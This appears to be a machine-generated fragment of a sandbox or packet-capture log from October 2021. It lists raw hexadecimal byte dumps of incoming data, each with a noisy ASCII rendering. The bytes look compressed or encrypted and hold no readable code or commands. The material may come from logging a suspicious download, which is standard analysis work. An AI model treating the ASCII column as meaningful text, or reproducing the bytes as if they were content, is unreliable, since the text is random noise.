76 a8 cb 83 2f c9 f6 3f 7f 06 7e 09 ee 02 1f fd a9 86 34 1e 9e 44 f2
                                                                        Data Ascii: yaTHjXmXc|fdSd19#+~}2#vU*Ka~P5-5>Sq-L96?H8>bgl2s&\X M(kcOUQq0(=!tzsFHDg`,0E|uf%l61jzZ~??5v/?~4D
                                                                        2021-10-14 08:47:23 UTC171INData Raw: d9 a5 26 62 97 6c c9 35 9e 07 e6 5e 98 ca 0b b1 52 0c 92 ae f2 58 06 a6 10 a2 ea 9d f2 20 3a b2 e8 69 fe 5e a9 42 36 06 b9 b2 7a fb 78 b0 28 4c be cf 66 cc 15 4e d1 f0 10 72 93 25 b6 0f 26 74 40 03 d1 2a 42 39 e4 a1 2f 9b 36 30 3c 55 b0 38 cc ed 80 75 90 72 d0 3f bf 25 e6 17 d1 95 dd b5 09 f9 19 08 38 7c 4f 71 bd 03 3c 5c 38 cf 89 e2 36 44 f5 28 ff 26 68 6e 56 0b 75 d5 2f 61 66 bb e1 96 b9 c4 23 5b 20 6f b9 09 c0 4c 2d 75 a1 92 3f 8b 06 6a 3e ad 5f 5f 3e c7 8d b4 cc e5 a9 99 a2 2f 73 cd dc 62 97 ca d4 51 7c ed 55 2f 56 92 d0 28 16 77 2b 78 dd 9c a1 3c 28 15 26 86 55 53 c5 92 87 e7 5d 58 f8 a3 96 07 7e c9 04 19 b4 d8 89 1d 4d 41 72 e1 76 ce 46 e8 66 f3 67 d6 e3 59 d4 64 a0 0e 8e 96 dd ff eb 34 9b 3a 2d aa ae 14 55 d1 cd e7 aa 86 15 f6 7d 00 94 a1 fb 74 fa
                                                                        Data Ascii: &bl5^RX :i^B6zx(LfNr%&t@*B9/60<U8ur?%8|Oq<\86D(&hnVu/af#[ oL-u?j>__>/sbQ|U/V(w+x<(&US]X~MArvFfgYd4:-U}t
                                                                        2021-10-14 08:47:23 UTC172INData Raw: 90 5c b1 33 e2 6e 96 3e a1 da 75 fa 75 4e fc 45 83 8a f9 52 9b ea eb ea 13 8a 61 68 c3 ed 52 33 57 f4 53 8a 9a fe ff 2a c9 74 13 a3 3c 64 68 6a 93 8f e9 23 34 9d f6 03 71 38 29 ad 98 a6 ae c3 bc c1 e7 4f e7 72 7f 53 1a ee b1 c3 4d 29 3f ca b7 53 ae c3 b4 02 37 f4 71 39 6d 5b 03 92 0d 3a fb da 6e 3c 3b 9a 0b e3 76 6c e0 1e 61 01 d8 e2 f4 e5 7d 60 d3 72 79 ed c5 06 e8 94 08 fc 28 dc 22 68 7a fa 0b 64 3b e6 d8 e7 6d cc 29 b1 7d a6 34 23 c1 9d 97 ea 98 eb 5f c7 25 97 96 d2 df b3 14 69 aa 5f 19 3f fb ee e7 84 7b 8e c4 54 69 a4 56 5d 3b fe a9 90 dd 2f 54 7f fc ae 16 e6 44 b2 50 18 89 fa 4a 7e be ae 7d 28 82 51 30 e1 e4 d9 08 2f 48 90 7e 77 cd 3c 05 e5 5b b3 1d 2d 03 64 b4 82 63 94 58 42 64 75 a9 3d c4 75 0f f0 64 ec 36 13 66 a8 a5 37 52 46 92 b5 2b 47 86 52 ed
                                                                        Data Ascii: \3n>uuNERahR3WS*t<dhj#4q8)OrSM)?S7q9m[:n<;vla}`ry("hzd;m)}4#_%i_?{TiV];/TDPJ~}(Q0/H~w<[-dcXBdu=ud6f7RF+GR
                                                                        2021-10-14 08:47:23 UTC173INData Raw: 4e 1d b6 9e 56 08 e3 3e 83 88 29 97 d8 da 71 97 bb c7 51 d9 f8 8e 2d 7c 94 ac 28 32 54 08 09 ce c8 ef 3f e5 0f 0c 80 e9 53 e1 bb a4 96 4e f0 12 93 66 16 54 c8 b0 1f 90 88 aa 6c 5e c1 90 f4 ad cc 6c e9 0a 9c 67 c5 e3 28 c7 08 58 0e fe 9e f7 fe c3 26 9d 29 2d db bd 94 f2 d6 3d f6 80 97 7d a7 7d 76 b7 d0 e8 a0 33 f7 1f 61 5e 87 9d 70 c4 91 91 9b b4 8c af aa 30 4d 3b fc 87 ba 24 6b b2 32 b2 82 23 86 74 12 08 06 fc 0c ee 88 3a 89 be 79 27 a6 96 94 7d 44 6d fa 64 4e c6 5b 2f 2a 46 78 de fe cb d5 ad 43 dc 8b 41 f3 42 cf 2c dd 68 bc 61 dc c2 b2 8b 2c 92 83 6f a7 e0 52 e6 d5 6d 7b 20 24 7d eb 3e bb fa 63 a7 db 3c 73 c7 70 e5 18 02 dd 60 22 72 0d 1d 1e fb e5 35 2f 27 60 9a 1a 31 c4 7f 0d 1f e6 01 b2 34 24 ef 9d d8 92 71 58 bf 5c 32 4b c7 fe ad 77 2e 4b 51 8d 11 82
                                                                        Data Ascii: NV>)qQ-|(2T?SNfTl^lg(X&)-=}}v3a^p0M;$k2#t:y'}DmdN[/*FxCAB,ha,oRm{ $}>c<sp`"r5/'`14$qX\2Kw.KQ
                                                                        2021-10-14 08:47:23 UTC175INData Raw: 96 59 7b ab 82 b3 d6 8e b5 10 36 8e 4c 19 42 fd d2 83 90 85 8f 95 42 41 93 56 4d 30 83 af 70 04 30 71 7b ae b8 4a d1 44 04 54 65 8f 4a b4 61 40 af 2f 3e ea 66 30 bf ef a4 0e 33 21 9e 50 76 9e 2a 99 ac 5d 47 16 50 05 34 cc 8c fb 97 0b 54 cc 3c af 63 cf 08 09 58 12 cc 87 17 32 b9 79 00 52 ed b8 c8 2d cb c6 72 51 cd da 60 ff f7 3e 3f 55 7b aa ca d5 67 9d 2d 59 16 3b 6c 45 0d 71 4b 02 c9 6e 34 fa a9 cf 5d 9e 35 51 35 2a 61 d5 13 07 9b 0b a2 13 4b 90 11 71 57 c8 c5 cc 5f 71 3b 22 02 4d 73 19 cf e3 89 e8 3e 51 9a 94 1b b2 01 ec 7a 37 f1 a3 2d 41 be ca dd bd 61 4c 6e e3 23 62 71 e6 86 b3 b7 18 4d 57 04 82 a5 d8 4e d2 d1 10 52 c1 e0 e1 7c c0 b4 5e 6d d4 48 8d 48 30 0c 95 cf 69 4b 4b b0 9e 48 94 c9 ba d0 31 6d f2 8d 03 ba a3 21 46 1e 0c 72 e0 13 f5 7b 6e 44 f7 61
                                                                        Data Ascii: Y{6LBBAVM0p0q{JDTeJa@/>f03!Pv*]GP4T<cX2yR-rQ`>?U{g-Y;lEqKn4]5Q5*aKqW_q;"Ms>Qz7-AaLn#bqMWNR|^mHH0iKKH1m!Fr{nDa
                                                                        2021-10-14 08:47:23 UTC176INData Raw: dc e2 43 5d c6 2a b9 65 c3 73 38 fc b6 b3 6a 27 ce 98 41 82 d4 91 17 de 8e be 1c 98 1e c2 88 d2 93 f2 f9 cb 3a 47 00 d7 10 6a c2 06 5a 6d 3e ca 6c 83 ca d8 da 71 ba 66 f3 69 01 f6 44 53 e4 39 12 0b 1d e7 48 39 15 11 99 2b 15 b5 e9 ed 9b e4 e7 b0 49 32 a1 ec db d1 55 2a 29 c4 58 5f 21 fc d0 61 44 3a 52 d3 35 f6 ff dd 1f 29 a6 73 fe 0d 84 17 2f 4c cb d8 1a 21 3c 2e c0 18 6e fb 62 3c 4a 38 a4 03 51 90 91 36 b3 6f 3f 6c 60 19 ec ae 8e 32 50 70 81 f8 d1 51 00 20 12 9a 0b 8b fe 0f 62 89 1e 45 53 18 e7 28 45 b6 1f ca f4 6b 35 7b 5d 7d 0e e1 0d be dc 00 53 71 33 a9 f8 3e a1 a3 3c 77 87 73 6c 1a 4a ca 8b b5 c4 47 3f f2 0c 11 f7 67 26 28 e2 92 33 1b 62 bb cf 9f 18 fd 57 cf 1e ce a8 75 65 25 fc 8f a9 f2 c5 36 e0 f0 75 93 33 e9 ad d5 30 86 b7 b9 27 e5 32 e1 e3 5e 7c
                                                                        Data Ascii: C]*es8j'A:GjZm>lqfiDS9H9+I2U*)X_!aD:R5)s/L!<.nb<J8Q6o?l`2PpQ bES(Ek5{]}Sq3><wslJG?g&(3bWue%6u30'2^|
                                                                        2021-10-14 08:47:23 UTC177INData Raw: 72 29 e3 b8 5a a3 d9 3c c4 00 30 65 74 ce e6 f7 c3 43 c7 2e 77 2f 54 03 91 7c a0 e6 84 3e 41 c3 5c a5 77 61 aa 6c 9e 35 d3 0e e5 5e 98 ca 8e b1 11 03 64 a7 a5 58 00 ae 13 a2 ea 9d 77 20 87 b4 b8 6f a9 5e 79 49 35 06 b9 b2 ff fb 9a b6 78 4a e9 cf b4 c4 16 4e d1 f0 95 72 b7 21 a0 1c 71 74 c0 07 d2 2a 42 39 61 a1 74 ad 20 23 6b 55 45 24 cf ed 80 75 15 72 f7 3c e3 2f b1 17 57 8f de b5 09 f9 9c 08 54 75 35 77 ea 03 e4 47 3b cf 89 e2 b3 44 3b 2d 59 3e 3f 6e 94 10 76 d5 2f 61 e3 bb e8 9a af d7 74 5b 9c 76 ba 09 c0 4c a8 75 87 92 02 8b 51 6a 50 ba 5c 5f 3e c7 08 b4 d4 f6 d8 81 f5 2f b3 db df 62 97 ca 51 51 bd fb 68 2f 01 92 f2 3d 15 77 2b 78 58 9c ec 2a 03 0d 71 86 96 46 c6 92 87 e7 d8 58 98 91 80 14 29 c9 20 0a b7 d8 89 1d c8 41 f0 e0 4b ce 11 e8 a3 e1 64 d6 e3
                                                                        Data Ascii: r)Z<0etC.w/T|>A\wal5^dXw o^yI5xJNr!qt*B9at #kUE$ur</WTu5wG;D;-Y>?nv/at[vLuQjP\_>/bQQh/=w+xX*qFX) AKd
                                                                        2021-10-14 08:47:23 UTC178INData Raw: 55 1f 50 05 2c 38 8f fb 97 0b d4 cc e9 9c db c6 08 09 9a e6 cf 87 17 32 3e 79 56 52 a0 90 c8 2d cb 33 71 51 cd da e7 ff 18 39 12 7d 7b aa 40 23 64 9d 2d 59 96 3b fc 43 fb 78 4b 02 b9 91 37 fa a9 cf dd 9e e0 57 58 38 61 d5 81 ff 98 0b a2 13 cb 90 ad 71 cf e1 c5 cc af 94 38 22 02 4d f3 19 84 e3 11 c1 3e 51 00 a3 19 b2 01 ec ea 2f 10 87 d8 43 be ca f5 5b 62 4c 6e e3 a3 62 cb e0 b8 9a b7 18 c3 b6 07 82 a5 d8 ce d2 d4 13 44 e8 e0 e1 b4 23 b7 5e 6d d4 c8 8d b2 3e e0 bb cf 69 4d a9 b3 9e 48 94 59 a2 6e 16 a8 d3 8d 03 aa 41 22 46 1e 0c e2 f8 2e c4 cc 40 44 f7 5b 3d a8 c6 21 16 c3 1c e4 cf 0b 82 08 83 6e b4 3c 05 2d cc 81 2d ee c8 53 0b 84 0a 36 5c 7f d3 75 97 95 78 b1 3b 29 8b 9f 25 24 a1 2d bf 3c 42 f8 2a cd 61 33 2d 1c 75 39 f5 92 49 d5 09 cd 7c 5a bb ef c2 31
                                                                        Data Ascii: UP,82>yVR-3qQ9}{@#d-Y;CxK7WX8aq8"M>Q/C[bLnbD#^m>iMHYnA"F.@D[=!n<--S6\ux;)%$-<B*a3-u9I|Z1
                                                                        2021-10-14 08:47:23 UTC179INData Raw: 48 39 52 32 99 2b 15 b5 e9 ed fc e2 e7 b0 49 32 78 cf db d1 55 2a 29 c4 6d 7a 21 fc d0 61 96 19 52 d3 35 f6 ff dd 84 2f a6 73 fe 0d db 34 2f 4c cb d8 1a 21 2e 08 c0 18 6e fb 3e 1f 4a 38 a4 03 51 90 1d 30 b3 6f 3f 6c c2 3b ec ae 8e 32 50 70 80 de d1 51 00 20 85 b8 0b 8b fe 0f 62 89 93 40 53 18 e7 28 d7 94 1f ca f4 6b 35 7b eb 5b 0e e1 0d be 50 25 53 71 33 a9 f8 3e 34 a6 3c 77 87 73 e3 3f 4a ca 8b b5 c4 47 d5 d8 0c 11 f7 67 a7 0d e2 92 33 1b 62 bb ba 9d 18 fd 57 cf 94 eb a8 75 65 25 fc 8f 17 dc c5 36 e0 f0 02 b5 33 e9 ad d5 30 86 a0 bc 27 e5 32 e1 51 78 7c 3f ea ff 55 11 cd 38 2c b5 2e a8 86 a1 2d c9 f5 3f af 05 80 03 74 0f 47 fd bd 3e 36 1e 9e 44 75 ea 3c e6 f8 63 7c de 7b a8 ef 83 61 9c e4 d1 78 c5 e0 ea e9 0e 47 11 ea 0c 69 2a 6c d7 6a 3d 00 da 9a 6b 11
                                                                        Data Ascii: H9R2+I2xU*)mz!aR5/s4/L!.n>J8Q0o?l;2PpQ b@S(k5{[P%Sq3>4<ws?JGg3bWue%630'2Qx|?U8,.-?tG>6Du<c|{axGi*lj=k
                                                                        2021-10-14 08:47:23 UTC180INData Raw: 3b 68 35 06 b9 b2 ff fb 44 ae 78 4a e9 cf 7a e6 16 4e d1 f0 95 72 c3 24 a0 1c 71 74 01 25 d2 2a 42 39 61 a1 3d 8b 20 23 6b 55 06 07 cf ed 80 75 15 72 63 3a e3 2f b1 17 11 ac de b5 09 f9 9c 08 02 5c 35 77 ea 03 26 64 3b cf 89 e2 b3 44 5c 2b 59 3e 3f 6e aa 33 76 d5 2f 61 e3 bb 51 b1 af d7 74 5b de 55 ba 09 c0 4c a8 75 22 95 02 8b 51 6a 96 98 5c 5f 3e c7 08 b4 3d c7 d8 81 f5 2f 71 f9 df 62 97 ca 51 51 18 fc 68 2f 01 92 bc 1c 15 77 2b 78 58 9c 92 12 03 0d 71 86 d8 67 c6 92 87 e7 d8 58 e5 97 80 14 29 c9 e2 2b b7 d8 89 1d c8 41 cb c5 4b ce 11 e8 61 c0 64 d6 e3 59 51 64 7a 0a 18 9c 8a ff 4f 04 98 3a 2d aa 2b 14 84 e7 db f4 fd 86 d3 fb 7e 00 94 a1 7e 74 5f f3 f9 63 23 91 4d 2c c7 07 b2 ea 22 38 aa 9b d6 4f 46 fa 6d 8e 03 78 b2 43 24 3e 8d 81 92 10 75 60 ec 51 ed
                                                                        Data Ascii: ;h5DxJzNr$qt%*B9a= #kUurc:/\5w&d;D\+Y>?n3v/aQt[ULu"Qj\_>=/qbQQh/w+xXqgX)+AKadYQdzO:-+~~t_c#M,"8OFmxC$>u`Q
                                                                        2021-10-14 08:47:23 UTC182INData Raw: 99 fe ff 2a 59 7c be a9 93 67 58 6a 8c f2 ea 23 34 9d 66 0b a6 26 0f af a8 a6 a2 be bf c1 e7 4f 77 7a c4 7d d9 e8 82 c3 54 54 3c ca b7 53 3e cb 1c 38 2f f7 42 39 62 26 00 92 0d 3a 6b d2 f4 37 f8 9c 39 e3 63 11 e3 1e 61 01 48 ea 9f f4 65 63 e1 72 7b 90 c6 06 e8 94 98 f4 21 ec ea 6b 57 fa 1b 19 38 e6 d8 e7 fd c4 a8 9f 03 a7 19 23 c7 e0 94 ea 98 eb cf cf b5 86 55 d4 f3 b3 18 16 a9 5f 19 3f 6b e6 36 8a 63 8d e8 54 73 db 55 5d 3b fe 39 98 aa 35 97 79 d3 ae 19 99 47 b2 50 18 19 f2 90 7f a6 ad 52 28 9e 2e 33 e1 e4 d9 98 27 5b 9b b6 74 e3 3c 0c 9a 58 b3 1d 2d 93 6c 37 ac 1d 95 76 42 7a 0a aa 3d c4 75 9f f8 36 c9 61 15 4f a8 a1 48 51 46 92 b5 bb 4f 6c 52 b7 cf a7 71 06 bf 3d f4 7f 06 3c e6 d9 62 7b 2f 24 00 21 5b 40 1d 7a 36 94 71 ed 11 1c ab b2 4b a5 ca 52 be 3a
                                                                        Data Ascii: *Y|gXj#4f&Owz}TT<S>8/B9b&:k79caHecr{!kW8#U_?k6cTsU];95yGPR(.3'[t<X-l7vBz=u6aOHQFOlRq=<b{/$![@z6qKR:
                                                                        2021-10-14 08:47:23 UTC183INData Raw: 0f 0c 10 f1 5a cd 74 85 9a 4e 6d d0 90 66 16 54 5f a8 9d b7 3e 8b 60 5e 17 5d f7 ad cc 6c 7e 0a fa 6d 30 e1 24 c7 13 97 0d fe 9e f7 69 c3 ef 98 dc 2f d7 bd 8d 3c d5 3d f6 80 10 7d b3 68 e6 96 dc e8 ce fd f4 1f 61 5e 07 9d ed c7 e1 b0 97 b4 e4 c8 a8 30 4d 3b 6c 9f 36 15 9e b0 3e b2 c0 ea 85 74 12 08 f6 ff 67 ec ee 19 85 be 4d ec a5 96 94 7d d4 75 17 54 bb c4 57 2f 24 8d 7b de fe cb 25 ae 68 cf 7e 43 ff 42 f3 e7 de 68 bc 61 0e c1 37 9c 34 91 8f 6f 48 2b 51 e6 d5 6d fc 38 73 5b 8b 3c b7 fa 27 6c d8 3c 73 c7 f0 e5 5e 14 10 46 2e 72 ff d5 1d fb e5 35 af 27 b3 98 cd 17 c8 7f 05 d7 e5 01 b2 34 a4 ef 4d ce 37 57 57 bf ce fa 48 c7 fe ad f7 2e d2 53 35 37 8b 69 f1 66 28 40 71 83 9b 01 0c 34 aa c9 a5 8c 6f 93 3a 26 1a 13 6d c2 2a 4c de a6 7e c7 e0 be 37 55 6d 42 fa
                                                                        Data Ascii: ZtNmfT_>`^]l~m0$i/<=}ha^0M;l6>tgM}uTW/${%h~CBha74oH+Qm8s[<'l<s^F.r5'4M7WWH.S57if(@q4o:&m*L~7UmB
                                                                        2021-10-14 08:47:23 UTC184INData Raw: 38 4a 9e 43 54 52 65 8f 91 3a 62 40 af 2f be ea 20 03 07 e6 a4 0e a3 90 9d 50 76 9e aa 99 c7 5c 55 1f 50 05 ca 7d 8f fb 97 0b d4 cc e0 9c db c6 08 09 30 a3 cf 87 17 32 3e 79 2a 52 a0 90 c8 2d a5 76 71 51 cd da e7 ff 44 39 12 7d 7b aa ed 65 64 9d 2d 59 96 3b a0 43 fb 78 4b 02 5c d7 37 fa a9 cf dd 9e c4 57 58 38 61 d5 24 b9 98 0b a2 13 cb 90 91 71 cf e1 c5 cc d3 d3 38 22 02 4d f3 19 a8 e3 11 c1 3e 51 bc e4 19 b2 01 ec ea 2f 8f 84 d8 43 be ca 16 1c 62 4c 6e e3 a3 62 15 ee b8 9a b7 18 64 f1 07 82 a5 d8 ce d2 38 13 44 e8 e0 e1 d6 64 b7 5e 6d d4 c8 8d 7b 3c e0 bb cf 69 ec ef b3 9e 48 94 59 a2 02 16 a8 d3 8d 03 4a 07 22 46 1e 0c e2 f8 60 c4 cc 40 44 f7 f8 7b a8 c6 21 16 c3 1c d8 cf 0b 82 08 83 09 f1 3c 05 2d cc 81 2d 18 c8 53 0b 84 0a 94 19 7f d3 75 97 95 78 55
                                                                        Data Ascii: 8JCTRe:b@/ Pv\UP}02>y*R-vqQD9}{ed-Y;CxK\7WX8a$q8"M>Q/CbLnbd8Dd^m{<iHYJ"F`@D{!<--SuxU
                                                                        2021-10-14 08:47:23 UTC185INData Raw: eb 76 00 d7 10 6a af 59 5a 6d 3e ca 6c 83 10 df da 71 ba 66 5c 37 01 f6 44 53 e4 39 52 34 1d e7 48 39 fc 4f 99 2b 15 b5 e9 ed f5 e2 e7 b0 49 32 12 b2 db d1 55 2a 29 c4 7a 7a 21 fc d0 61 31 67 52 d3 35 f6 ff dd af 2f a6 73 fe 0d 41 4a 2f 4c cb d8 1a 21 25 08 c0 18 6e fb a0 61 4a 38 a4 03 51 90 22 30 b3 6f 3f 6c 58 44 ec ae 8e 32 50 70 bf de d1 51 00 20 63 c7 0b 8b fe 0f 62 89 9a 40 53 18 e7 28 7e eb 1f ca f4 6b 35 7b fd 5b 0e e1 0d be 3a 5a 53 71 33 a9 f8 3e 3d a6 3c 77 87 73 4c 41 4a ca 8b b5 c4 47 9e d8 0c 11 f7 67 4c 73 e2 92 33 1b 62 bb a3 9d 18 fd 57 cf 32 95 a8 75 65 25 fc 8f 18 dc c5 36 e0 f0 7b c8 33 e9 ad d5 30 86 dc bc 27 e5 32 e1 e8 05 7c 3f ea ff 55 11 a9 38 2c b5 2e a8 7f dc 2d c9 f5 3f af 05 dc 03 74 0f 47 fd 04 43 36 1e 9e 44 75 ea 10 e6 f8
                                                                        Data Ascii: vjYZm>lqf\7DS9R4H9O+I2U*)zz!a1gR5/sAJ/L!%naJ8Q"0o?lXD2PpQ cb@S(~k5{[:ZSq3>=<wsLAJGgLs3bW2ue%6{30'2|?U8,.-?tGC6Du
                                                                        2021-10-14 08:47:23 UTC187INData Raw: 06 5d 35 37 93 03 b7 42 d1 cb e1 b1 cb 0e 59 a7 71 58 16 88 f1 a0 eb 9c d8 2d d0 b7 5f 6c 87 53 6b 46 9e 06 7d 99 83 f9 7d b1 84 6d 87 cf ab cb 0e 6b 20 f2 c2 72 cb 28 b1 1c cd 74 9e 01 2e 2b 83 39 7b b9 d6 a8 07 21 0c 7a 0f 2a dc ec e3 60 80 71 bb 3f 8a 06 c6 14 34 80 13 86 06 fa 23 09 c5 56 d9 76 a6 02 40 5f e2 cd 40 e2 46 63 a1 2c 76 3c 2d 62 36 1d 4d d4 85 6d 3c ba 2a 90 30 cc 1a 5b 3d 79 1c 2d e2 4f 7f 74 ac b4 62 89 05 6b ec a5 76 5c 17 c6 1d 87 a3 e1 17 82 18 08 a3 d7 8c 63 1e e9 fb 52 87 f9 16 1f 3c 91 6d 32 41 64 6c 7b 17 9c 08 2e f6 0f 6d 87 fa 52 ce 91 e6 e6 bd 7a d8 91 0f 17 d2 d6 2e 05 c4 d9 93 38 4d 41 79 f4 dc d9 35 eb 8b ef 66 c6 bd 5a 46 65 36 24 9a 9d 7e fe 03 0e d3 3b bc ab 18 1f 13 d4 84 f7 ff 96 f9 d6 bd 01 f3 89 63 77 21 f7 48 49 cf
                                                                        Data Ascii: ]57BYqX-_lSkF}}mk r(t.+9{!z*`q?4#Vv@_@Fc,v<-b6Mm<*0[=y-Otbkv\cR<m2Adl{.mRz.8MAy5fZFe6$~;cw!HI
                                                                        2021-10-14 08:47:23 UTC188INData Raw: 1a 66 ff 7e c0 ca 66 fa da 46 ab 5e 13 8e 9c 52 e3 a0 2d e2 c2 89 12 50 65 e1 5b 33 e1 f3 89 c0 4a fc c6 3e f7 75 03 aa db 6e 1b 63 b6 c8 f2 06 ac 9e 11 08 2e 1c ab a4 ec a5 6a b4 93 c0 0e 4c a4 5a 0a 77 d6 e9 8b ce 58 6c 97 ca d4 77 e1 ca 2a 2f 4d e0 44 30 2c 1f b0 9b 8d 33 0c d1 b7 2b 3b 9a b5 e0 60 37 c4 1a 60 05 af ff c3 ec 72 62 ff 65 f4 ad 35 05 72 8b 2b f0 9a e8 63 4a 63 fb 36 23 83 cb 45 ee da c4 85 85 21 ac 8d 21 8e d3 3e ef 71 e9 23 da 42 8b 02 d6 19 b3 db 25 1a 5f 68 2a 4b e2 b4 93 ff 9a 4f 5d 15 e1 73 55 b9 f9 a6 9c 59 02 91 72 07 ae d2 8b 9c b7 01 1a 95 d7 d7 64 e9 af c1 03 c1 1e bd e1 05 eb 37 2d 4d 9f 3e 6c a1 36 30 a0 2b a6 54 2c 94 6d bb 8d bd 9d 02 46 4f 03 e3 37 dd 71 13 dd 4e c9 b6 13 3c be e5 78 72 42 88 90 91 4b b6 72 70 de 79 7b d6
                                                                        Data Ascii: f~fF^R-Pe[3J>unc.jLZwXlw*/MD0,3+;`7`rbe5r+cJc6#E!!>q#B%_h*KO]sUYrd7-M>l60+T,mFO7qN<xrBKrpy{
                                                                        2021-10-14 08:47:23 UTC189INData Raw: d5 8f 93 2b 69 9d be 93 15 da 2f 94 d3 c1 31 7b 16 9b 0c 7a 88 91 21 17 56 2d 61 c6 5c 68 0f e3 cc 2a c0 e7 60 c2 d2 93 ab 58 69 93 90 43 85 53 f8 ae 6b af 8b 9f 24 58 26 28 bc ac c5 68 f5 1e 6a 70 0f e3 14 d4 94 c4 ee fc b7 e2 24 c1 83 9a 94 04 88 aa 85 7d 16 3a d1 97 2f 7d 9a 68 88 83 08 e8 2e 8a 35 08 30 5f dc 8e ca d2 46 b4 94 bd f7 9a e3 36 38 1f 0d 88 31 00 09 a7 98 b0 af ae 10 74 53 10 f1 fb 8d ea ed 0e 51 be 22 be 08 8e 3d 7d 87 58 0f 59 4c c7 43 03 a0 ce e8 df 86 ea 56 bb 44 ca 82 64 91 42 70 a0 c6 4d ae 7b 89 c0 8d 92 53 95 e3 6e 82 47 d2 e0 94 6f 13 1c 36 5c 64 3b cb ee 90 2a db 39 b1 e5 d7 ff 1b 05 23 6a 8b 71 48 95 a7 d2 52 2f 90 27 08 be e9 0f 8c 7c ba 98 eb 1a 03 34 ce ef f1 c2 2d 55 30 9a d7 bd 4e c6 e4 88 19 29 c5 50 f7 3d 74 6e 21 21 97
                                                                        Data Ascii: +i/1{z!V-a\h*`XiCSk$X&(hjp$}:/}h.50_F681tSQ"=}XYLCVDdBpM{SnGo6\d;*9#jqHR/'|4-U0N)P=tn!!
                                                                        2021-10-14 08:47:23 UTC191INData Raw: 5c b3 4a a8 0a 0f a1 ab 71 18 86 fa 2e 5d 55 86 76 95 93 4f 07 55 9c 38 2c 83 65 fb f8 76 61 8b bd 4a 6a 42 95 5c 3e 8f db 6a 3a 70 47 2c e1 ed 28 24 2f e0 a0 0b 49 db 24 77 67 9f b0 b5 65 5f 62 1a 52 15 b2 0b 3c fb e6 1e a6 eb e9 af 42 d4 99 2e 19 f5 d7 a2 d7 32 49 7e c4 75 48 96 9c 2f a6 01 76 79 24 dd 1f e5 8e 17 05 78 2e b9 7f 30 4f 9f 43 43 20 3f 71 40 7b 6a 25 02 18 86 b7 d6 29 c3 12 9f 80 45 70 3e 58 d4 71 ce 89 0b ee 12 47 b5 70 70 00 e2 b1 c4 1d a9 83 25 d9 54 c6 1a 7a e3 ef d0 86 79 6a b7 3f ba 83 eb 38 2e b9 b4 e4 46 8f cb 18 60 4e 4d 67 e7 5d 4d ca cf 0a 99 d0 3d 71 a8 49 83 81 d0 da d5 aa 15 d5 fa 40 c9 7c 37 91 56 ef d3 02 8c f9 19 28 b8 ee 68 95 a6 21 98 14 95 d5 87 d9 14 77 d2 3b 28 e9 7d 19 45 76 1a 5a f9 30 d3 80 51 9a de fd 29 a8 e3 e6
                                                                        Data Ascii: \Jq.]UvOU8,evaJjB\>j:pG,($/I$wge_bR<B.2I~uH/vy$x.0OCC ?q@{j%)Ep>XqGpp%Tzyj?8.F`NMg]M=qI@|7V(h!w;(}EvZ0Q)
                                                                        2021-10-14 08:47:23 UTC192INData Raw: 83 2a 27 65 4b 7c 21 f7 c3 b3 2a 20 37 92 49 82 ca 94 e7 de 60 bc ed 9d fb df 82 d2 03 f7 57 e7 65 53 72 d0 50 46 11 04 2b 6d fb ca d4 83 b1 cd a5 5f e9 66 46 7d a1 da 6a 53 d9 2e 52 33 bb e5 1e 39 62 12 db 2b 06 b5 62 ed d2 e7 12 b2 29 32 ac ef c2 d1 79 2a f6 c4 ce 4a 1c fe ce 61 35 39 7c d3 56 f6 7a dd 3c 2a 29 71 f0 0d f5 14 ad 4c e0 d8 c9 21 57 38 3d 1a 3f fb 41 3f 33 38 e1 03 44 90 7a 35 10 6d cb 6c af 1a e8 af 2e 32 ed 70 e1 ef 96 53 b6 20 80 99 a8 8b 2d 0f b1 89 2f 46 a6 1a 87 28 15 b5 de ca 8a 6a 63 7b 39 6a ad e3 b3 be 30 04 52 73 f0 a9 7d 3e 60 a0 3a 75 d1 73 03 1e ab ca 08 b5 17 47 a9 eb c1 13 cf 67 60 2d f3 92 2e 1b d4 ba da 9b e3 ff 0a ce 57 ca ef 75 25 24 41 8f 8e e8 63 35 8e f0 16 97 51 e8 be d5 bb 86 e7 bc ea e7 0a e1 fa 5b 55 3f af ff 63
                                                                        Data Ascii: *'eK|!* 7I`WeSrPF+m_fF}jS.R39b+b)2y*Ja59|Vz<*)qL!W8=?A?38Dz5ml.2pS -/F(jc{9j0Rs}>`:usGg`-.Wu%$Ac5Q[U?c
                                                                        2021-10-14 08:47:23 UTC193INData Raw: c4 bd 81 3a a0 0a 45 7b 19 c3 c8 c3 0f 5e 51 2e 08 0e ba 1f ec 7c 0a f5 8e 20 41 c3 56 aa 82 7d 4c 6e 46 14 57 1d e7 5e ba d6 da bf a3 05 f6 ab e2 46 d2 a3 f8 ae 28 93 e1 20 0b aa 9c 63 d4 5e 5e 76 e7 1b b9 b2 a2 f3 86 af 9e 48 cd c7 98 d4 14 4e 21 e3 32 6d 54 20 62 17 04 6a f8 09 5c 02 55 1a f7 a1 7d 85 0a 3c 16 55 58 0e d0 ce 80 75 7c 69 60 30 05 2d 66 3c c3 a9 dc b5 cc f6 be 21 4a 7d 61 58 5b 1e 78 49 d2 e5 33 cb 25 44 be 28 8a 22 42 6e 60 13 b6 db 2f 61 a5 b2 21 9e 49 d5 c1 58 be 76 b8 09 65 6f fc 7b 3c 90 e0 89 2f 6a 50 b5 5b 5f 3b c7 9c b4 88 e2 39 83 8a 2f 90 d4 d4 62 95 ca c8 51 55 f9 8c 2d 68 92 b9 32 16 77 3e 78 c3 9c 6a 3e f3 0f 03 86 f0 49 d3 92 88 e7 4c 58 e8 92 77 16 56 c9 d6 05 a6 d8 88 1d 21 41 0b f5 af cc 72 e9 1f ee 67 d6 fc 58 d2 64 d0
                                                                        Data Ascii: :E{^Q.| AV}LnFW^F( c^^vHN!2mT bj\U}<UXu|i`0-f<!J}aX[xI3%D("Bn`/a!IXveo{</jP[_;9/bQU-h2w>xj>ILXwV!ArgXd
